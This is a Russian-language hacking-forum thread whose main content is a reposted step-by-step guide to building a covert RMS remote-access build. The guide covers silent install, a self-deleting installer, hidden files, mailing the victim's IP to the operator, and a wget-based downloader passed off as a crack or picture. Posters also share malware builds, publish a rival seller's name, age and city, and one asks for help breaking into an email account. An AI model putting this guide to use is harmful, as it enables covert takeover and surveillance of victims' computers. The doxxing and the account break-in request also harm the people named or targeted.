RMS - полностью скрытая установка и управление.

[Hacker3]

думаю отсюда

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Это один и тот же человек посмотри на дату публикации, и вообще какая разница я просто записал видео чтоб люди знали.

 

[X-Shar]

Неплохой ролик, кстати в описании вообще написано:

Скопировать в буфер обмена

For
https://fuckav.ru/
https://crypters.ru/

Описание любой может просмотреть, поэтому думаю претензий быть не должно, что мы что-то там "Тырим" с других ресурсов...

 

[X-Shar]

Распотрошенная сборка для анализа:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Пароль:infected

Билд вот:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Продажник, если это он, т.е. его сборка:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Kama_pulia]

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Сожалею тем кто скачал, и запустил. На будущее запускайте хотябы через Sandboxie

 

[Hacker3]

вот полностью скрытый rutserv с переименованный процессом не упакован ничем сравнивайте с оригиналом!

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

12345

 

[dim123]

Ребят есть у кого нибудь RMS 6.3.0.3?

 

[Hacker3]

Оригинал:

Измененный:

где то тут нада чето менять паходу!

 

[Hacker3]

во

 

[Hacker3]

и вот еще

 

[Михаил7]

Недавно у меня появилась навязчивая идея попробовать сделать свою сборку RMS с полностью скрытой установкой и дальнейшим скрытым управлением.
В инете много противоречивых отзывов по поводу этого - одни пишут о бессмысленности ввиду большого многообразия альтернативных методов (кейлогеров, стиллеров и т.д.), другие, наоборот, представляют данный метод, как отличный вариант скрытого удаленного многофункционального управления. Кто-то на этом зарабатывает, продавая сборки RMS. Между конкурентами даже разворачиваются разборки с последующей деанонимизацией. Так, например, предлагающий свои услуги

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

LiteDem0 оказался:

Спойлер

LiteDem0 | haveaccess.ru оф. селлер:

Посмотреть вложение 37997

Посмотреть вложение 37998
​

Источник:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

.​

А

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

- автор этой

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Спойлер

Скрытый RMS [удаленное администрирование]​

Всем доброго времени суток!


Сегодня мы с вами будем делать скрытую сборку Remote Manipulator System (аналог Radmin, Teamviewer)
Сразу предупреждаю, что собрать довольно сложно, особенно новичкам.

Видео-презентация как работает скрытый RMS:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Я постараюсь объяснять все пошагово и доступным языком.
RMS (как и Radmin, TeamViewer и т.д.) выполняет одну и ту же функцию – удалённое администрирование (т.е. управление) компьютером

Что же умеет RMS?
Тут перечислены все его функции:
-Управление и наблюдение
-Файловый менеджер
-Текстовый чат
-Диспетчер задач
-Подключение посредством Internet-ID! (так же как у TeamViewer)
-Диспетчер устройств
-Подключение к командной строке
-Запись экрана по расписанию
-Простое текстовое сообщение
-Поддержка нескольких мониторов
-Удаленная установка
-Wake-On-Lan
-Удаленный реестр.
-Функция «Выполнить»
-Подключение к web-камере.
-Самоудаление
-Интеграция с фаерволлом

Начну с перечисления того, что собой представляет сборка:
1. Полностью скрытая установка (экран не моргает в отличии от Радмина)
2. После запуска установщик самоудаляется
3. Все файлы сборки скрыты/системны, жертве будет сложнее что-то заметить
4. Вам на почту дополнительно отправляется IP, но он нам не понадобится, скорее всего, так как мы будем использовать Internet-ID
5. Вес будет ~2,8мб
6. Данная сборка частично палится антивирусами (как сделать, что бы не палилась - пишите в контакты)

Итак, начнем собирать:

I. Настройка RMS сервера

Первым делом, скачиваем архив
Внимание! На архив стоит пароль

Пароль на архив:
-
Открываем папку R, запускаем файл server.exe, устанавливаем. По завершении установки, программа запустится сама:



Посмотреть вложение 37999

Перед нами появляется окошко Безопасности:
Посмотреть вложение 38000

Нажимаем Сменить/Установить – вводим пароль, допустим 12345678rms
Переходим во вкладку Аутентификация, стоять должна галочка – Уровень 3
Далее, нажимаем ОК! Все, окошко исчезает.

Следующим шагом для нас будет настройка сервера
В правом нижнем углу кликаем правой кнопкой по синему значку
Настройка Internet-ID соединения
Нажимаем Получить новый ID, появляется что-то похожее:
Посмотреть вложение 38001

Закрываем окошко.
Далее «Остановить RMS-сервер»

Следующим шагом для нас будет вторая часть настройки сервера:
открываем Пуск, Программы, Remote Manipulator System – Server, Settings for R-Server

Тут будет два шага, первый мы уже прошли («безопасность»).
2. Режим Запуска – Автоматический
3. Настройки, убрать все галочки, поставить только на "запретить закрытие RMS", также во вкладке Логирование галочка должна быть снята.
4. Лицензионный ключ – введите этот:
-

5. Закрываем Настройки

Открываем директорию, куда установился сервер, и выделяем следующие файлы:
Посмотреть вложение 38002

Копируем, создаем где-нибудь папку, туда все вставляем.
Именно в этой папке у нас будет происходить все самое интересное, далее я эту папку буду называть “Новая Папка”

Продолжаем работать. Теперь нам надо экспортировать наши настройки с паролями и всеми настройками.

Для этого нам нужно сделать следующее:

Для ХР, WIN+R: regedit
Для 7, просто в строке «найти программы и файлы» вводим regedit, и Ок
Идем сюда: HKEY_LOCAL_MACHINE/SYSTEM/ далее экспортируем Remote Manipulator System
Посмотреть вложение 38003

И указываем путь нашу созданную папку, (имя файлу задайте - sets) в которую мы копировали наши файлы сервера, вот что у Вас должно получиться:
Посмотреть вложение 38004

Сам по себе файл sets.reg – это файл настроек, там хранятся все Ваши настройки, если Вы хотите что-то изменить, Вам нужно заменять только этот файл, проделав все предыдущие шаги.

II. Редактирование установщика

Ну вот, перешли к главной части.

Выделяем install.bat, правой кнопкой - изменить
(первая половина кода служит для того, чтоб на компе жертвы удалить ранее установленный Радмин, Rem_Cam, и если стоял ранее то и RMS, нам ведь не надо чтоб кто-то тоже имел доступ к компьютеру кроме нас).

Тут два простых шага:
1. Создаем почту на Яндексе(!):
2. Пожалуйста, здесь не тупите, чтоб не было потом вопросов!
Находим это почти в самом конце и редактируем вот это под себя:
Посмотреть вложение 38005

###LOGIN### - это ТОЛЬКО логин, БЕЗ добавления @yandex.ru, ###PASSWORD### - 12345678, тут ясно -указываем свои данные с регистрации в Яндексе.
Закрываем, сохраняем.

Выделяем в Новой Папке файл setup.exe, правой кнопкой -открыть архив.
Выделяем все что есть в Новой Папке (кроме setup.exe разумеется) и перетягиваем в то открывшееся окошко. Успешно добавили файлы в архив.

В итоге у Вас должно выйти вот это:

Посмотреть вложение 38006

Копируем куда-нибудь наш файл setup.exe.
Все остальное можете удалить из папки.

III. Завершение

Итак, открываем папку R, устанавливаем файл Viewer.exe, через него мы будем подключаться к «жертве» по Internet-ID.

Важно!
Если Вы собираетесь свою сборку кидать нескольким «жертвам» и сразу, то с Интернет-ИД будут проблемы, так как он присваивается одной сборке для одного компьютера.
Если Вы собираетесь распространять скрытый rms массово, то в таком случае нужно к каждой «жертве» подключаться по IP

Как я лично советую использовать данную сборку.
Вы кидаете её какой-нибудь одной жертве, она его устанавливает. Далее Вы можете по тому Internet-ID (который вы выше копировали) подключаться. Сделали всё что Вам нужно на компьютере жертвы и дальше удаляете сборку с компьютера жертвы
Для этого нужно:
Подключаетесь к жертве и выбираете подключение «Запуск программ»-Обзор - у жертвы заходите в директорию windows\system32 там находите файл de.exe, выбираете.(поставьте галочку «скрытый запуск»)

Файл de.exe входит в состав сборки. Это самоудаляющийся файл, который полностью удаляет с компа жертвы вашу сборку скрытого рмс

После запуска этого файла у жертвы лучше проверить удалилась ли сборка (для этого просто пытаемся подключиться снова), если не можем, это означает сборка успешно удалилась и мы можем использовать нашу сборку на другой жертве точно также как и на первой.
Это делается для того чтобы не было конфликтов между двумя компьютерами с одним Internet-ID.

Большим преимуществом данной сборки будет то что подключение будет стопроцентным! Даже если жертва имеет динамический IP (или за NAT'ом).

Также данная сборка интегрируется с фаерволом. В настройках можно включить экономию трафика, в этом случае все работать будет пошустрее и меньше трафика ест.
Еще не меньше порадовало наличие встроенного сканера серверов RMS. Если вы вдруг потеряли свою жертву с динамическим IP, Вы можете её легко найти, просканировав диапазон IP в котором она находится (например 92.72.0.0-92.72.255.255)

В общем – пробуйте, пишите отзывы, бросайте СПАСИБО


по желанию, создание даунлоадера

Что из себя, собственно, представляет данный даунлоадер и для чего он нужен?
Это .exe файл, который сразу после запуска самоудаляется, скачивает файл и устанавливает, после запуска самоудаляется, не оставив при этом никаких следов

Итак, начнем!

Все что нужно, находится в папке Downloader

Итак, нам нужна регистрация сервера на Яндексе.
У Вас уже должна быть почта на Яндексе, куда приходят IP. С этого аккаунта мы зарегистрируем наш сервер, куда будем заливать нашу сборку.

Для этого:
1. Зайдите на свой аккаунт на Яндексе
2. Переходим по ссылке

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

3. Нажимаем «Создать сайт» (сайт нам не нужен, только файл-менеджер)
4. Когда наш сайт создан заходим в файл-менеджер, ****.narod2.yandex.ru/filemanager/
5. Выбираем «Загрузить файл», загружем нашу RMS сборку
6. После того как загрузится файл, там должна быть такая серенькая кнопочка «ссылка», нажимаем, копируем.

Допустим, у нас уже есть сервер на Яндексе, на котором лежит наш файл. Отлично, идем дальше.
Далее распаковываем наш скаченный архив, открываем папку link, файл winupd.bat – изменить.
###LINK### - адрес на файл
###DOWNLOADED'FILENAME### - название файла

Далее закрываем
Открываем Converter.exe из архива

Batch file: открываем наш батник - winupd.bat
Save us: оставляем как есть
Остальное ставим как на картинке, должно получится вот так:
Вкладка Options:
Посмотреть вложение 38007


Во вкладке Include добавляем файл wget.exe
Вкладка Include:
Посмотреть вложение 38008

Далее нажимаем Compile

Следующим шагом для нас будет помещение файла winupd.exe в оболочку, которая его будет дроппать и после этого самоудалятся.
Клик по файлу load.exe, открыть архив, перетягиваем файл winupd.exe в файл load.exe

Всё! Наш даунлоадер готов!

Для непалевности и удобства, можно впарить кому-то наш файл под видом кряка, патча, картинки и пр. (сразу говорю, невозможно создать установщик с расширением .jpg, .mp3, разве что перед этим покопавшись в реестре жертвы, ну это бред, лучше использовать СИ)

Все! Готово!

ВНИМАНИЕ! Добавил "Экспресс-сборку"! Я решил, что её пока-что смогут опробовать не все.
А остальное все по-прежнему..

Изменения в Express RMS:

- Упрощена настройка (логин и пароль вводите в текстовике)
- После перезагрузки повторно отправляет IP
- В установщике теперь всего 6 файлов:
- Установка проходит гораздо быстрее

Прошу не обращаться в личку с просьбой дать ключ на котором ограничения, по всем вопросам, а также Новым версиям сборок пишите мне на контакты (внизу)

не забудьте сказать СПАСИБО и рекомендуйте друзьям данный замечательный продукт!

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

По любым вопросам/консультациям/обучению обращайтесь:
mail: [email protected]

skype: vinject

оказался:

Спойлер

Игорь Франк 24 года, Донецк, Украина


Посмотреть вложение 38009

Посмотреть вложение 38010

Источник:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

и

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Очень интересно узнать ваше мнение по поводу сборки скрытого RMS сервера, стоит ли вообще с этим затеваться, а, если да, то надеюсь обрести союзников в этом деле.
Честно признаться, сомневаюсь в своих силах, а вместе всегда легче добиться нужного результата.

P.S. сам RMS можно бесплатно скачать

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

.
Комментарии по теме:смотрю в последнее время в теме стали появляться залётные гости,не желающие написать пару полезных постов на форуме и нацепить аватарку.Единственное,что они могут,это клянчить готовую беспалевную сборку.Никто из них даже мельком не просматривает содержимое темы.Так вот,на правах администратора заявляю,что личности без авки и с просьбами типа:"Скиньте мне сборку!","Как сделать беспалевную сборку RMS?","Соберите для меня за деньги..."—будут безжалостно баниться.Хотите готового...идите на х...в гугл.В теме принимаются вопросы технического характера по различным проблемам и траблам при создании своей сборки.

Добрый день господа асы интернета,обращаюсь к вам с помощью по теме взлома электронной почты на майле,случилась неприятная ситуация,кинули на деньги в сумме 100 000,сейчас в полной жопе и с долгами, т.к пока жил и работал,занимал под этот расчет,работал по строительству,сварил каркас металлический в частном доме,по окончанию работ,подрядчик слился с деньгами,хозяева разводят руками,мол отдали все деньги,номер машины не помню,по телефону 3 день игнор,,есть почта когда с ним списывался по стройке,последняя надежда хоть как то зацепится и найти его,еще пострадали молдоване 2 месяца работали за кармешку.